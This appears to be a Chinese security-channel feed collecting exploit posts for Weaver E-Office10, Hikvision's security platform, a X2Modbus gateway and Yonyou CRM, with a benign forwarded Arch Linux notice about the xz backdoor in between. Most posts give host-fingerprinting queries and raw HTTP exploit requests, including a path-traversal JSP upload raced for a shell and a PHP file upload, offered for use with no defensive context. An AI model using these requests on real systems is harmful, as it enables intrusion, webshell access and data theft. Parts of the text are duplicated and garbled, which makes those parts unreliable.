泛微E-Office10远程代码执行漏洞
body="eoffice-loading-tip" app="泛微-EOffice" body="/general/login/index.php"
xpoc -r 421 -t http://xpoc.org
body="eoffice-loading-tip"
POST- /eoffice10/server/public/api/ empower/import HTTP/1.1xpoc已提供一键检测
Host:
Content-Type: * application/x-www-form-urlencoded
type-tttt&file=fad5d6631fb8ef9e9268c1f3bcab0c11
xpoc -r 421 -t http://xpoc.org
Forwarded from Arch Linux Chinese Messages (farseerfc 😂)
xz 软件包被植入后门
简单讲:立即升级系统和容器镜像!
大家可能已经听说了 [1],xz 上游发布的 5.6.0 和 5.6.1 版本的代码包(tarball)中含有添加后门的恶意代码。
Arch Linux Security Tracker 记录了该漏洞 [2]。
xz 软件包旧于 5.6.1-2 的版本(即 5.6.0-1 和 5.6.1-1)包含该后门。
以下发布内容(release artifacts)也包含了受影响的 xz 版本:
- 安装镜像:2024.03.01 版
- 虚拟机镜像:20240301.218094 和 20240315.221711 版
- 容器镜像:任何 2024-02-24 到 2024-03-28 之间(包括这两个日期)构建的版本
受影响的发布内容已经从我们的镜像站上移除。
强烈建议不要使用受影响这些受影响的发布内容。请下载当前的最新版本!
升级系统
如果你的系统当前安装了 xz 5.6.0-1 或 5.6.1-1,强烈建议你立即进行完整系统升级:
升级容器镜像
要确定否正在使用受影响的容器镜像,使用以下命令(podman 用户):
或者(docker 用户):
所有旧于 2024-03-29 且新于 2024-02-24 的 Arch Linux 容器镜像都受到了影响。
使用以下命令升级受影响的容器镜像到最新版本(podman 用户):
或者(docker 用户):
升级之后,请确保重新构建基于受影响版本的任何容器镜像,并检查所有运行中的容器!
sshd 认证绕过 / 代码执行问题
根据上游报告 [1]:
Arch 并不直接将 openssh 链接到 liblzma,因此这种攻击途径是不可能的。可以通过以下命令来确认这一点:
但是,出于谨慎,我们建议用户通过升级系统/容器镜像移除恶意代码 —— 因为可能有其他还没有被发现的后门利用方法。
https://www.archlinuxcn.org/the-xz-package-has-been-backdoored/
简单讲:立即升级系统和容器镜像!
大家可能已经听说了 [1],xz 上游发布的 5.6.0 和 5.6.1 版本的代码包(tarball)中含有添加后门的恶意代码。
Arch Linux Security Tracker 记录了该漏洞 [2]。
xz 软件包旧于 5.6.1-2 的版本(即 5.6.0-1 和 5.6.1-1)包含该后门。
以下发布内容(release artifacts)也包含了受影响的 xz 版本:
- 安装镜像:2024.03.01 版
- 虚拟机镜像:20240301.218094 和 20240315.221711 版
- 容器镜像:任何 2024-02-24 到 2024-03-28 之间(包括这两个日期)构建的版本
受影响的发布内容已经从我们的镜像站上移除。
强烈建议不要使用受影响这些受影响的发布内容。请下载当前的最新版本!
升级系统
如果你的系统当前安装了 xz 5.6.0-1 或 5.6.1-1,强烈建议你立即进行完整系统升级:
pacman -Syu
升级容器镜像
要确定否正在使用受影响的容器镜像,使用以下命令(podman 用户):
podman image history archlinux/archlinux
或者(docker 用户):
docker image history archlinux/archlinux
所有旧于 2024-03-29 且新于 2024-02-24 的 Arch Linux 容器镜像都受到了影响。
使用以下命令升级受影响的容器镜像到最新版本(podman 用户):
podman image pull archlinux/archlinux
或者(docker 用户):
docker image pull archlinux/archlinux
升级之后,请确保重新构建基于受影响版本的任何容器镜像,并检查所有运行中的容器!
sshd 认证绕过 / 代码执行问题
根据上游报告 [1]:
openssh 不直接使用 liblzma。但 debian 和其他几个发行版对 openssh 打了补丁,引入了 systemd 通知支持,而 libsystemd 确实依赖于 lzma。
Arch 并不直接将 openssh 链接到 liblzma,因此这种攻击途径是不可能的。可以通过以下命令来确认这一点:
ldd "$(command -v sshd)"
但是,出于谨慎,我们建议用户通过升级系统/容器镜像移除恶意代码 —— 因为可能有其他还没有被发现的后门利用方法。
https://www.archlinuxcn.org/the-xz-package-has-been-backdoored/
❤1👍1
海康威视综合安防平台文件上传漏洞
上传过后文件会被服务器删除,利用条件竞争高频率请求文件拿shell
文件上传后的地址:/clusterMgr/123.jsp
POST /center_install/picUploadService/v1/uploadAllPackage/image HTTP/1.1
User-Agent: PostmanRuntime/7.36.1
Accept: */*
Postman-Token: 04eaee1f-c6cb-49fa-bf8e-88b839f98acc
Host: xx.xx.xx.xx
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------553898708333958420021355
Content-Length: 233
----------------------------553898708333958420021355
Content-Disposition: form-data; name="sendfile"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/123.jsp"
Content-Type: application/octet-stream
123
----------------------------553898708333958420021355--
上传过后文件会被服务器删除,利用条件竞争高频率请求文件拿shell
文件上传后的地址:/clusterMgr/123.jsp
👍2
迅饶科技X2Modbus网关GetUser 信息泄露漏洞
server="SunFull-Webs"
server="SunFull-Webs"
POST /soap/GetUser HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Length: 58Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
<GetUser><User Name="admin" Password="admin"/></GetUser>
用友crm文件上传漏洞
app.name="用友 CRM"
/tmpfile/{{path}}.tmp.php
app.name="用友 CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------269520967239406871642430066855Content-Length: 355-----------------------------269520967239406871642430066855Content-Disposition: form-data; name="file"; filename="%s.php "Content-Type: application/octet-stream<?phpinfo();sleep(8);unlink(FILE);?>-----------------------------269520967239406871642430066855Content-Disposition: form-data; name="upload"upload-----------------------------269520967239406871642430066855--
/tmpfile/{{path}}.tmp.php


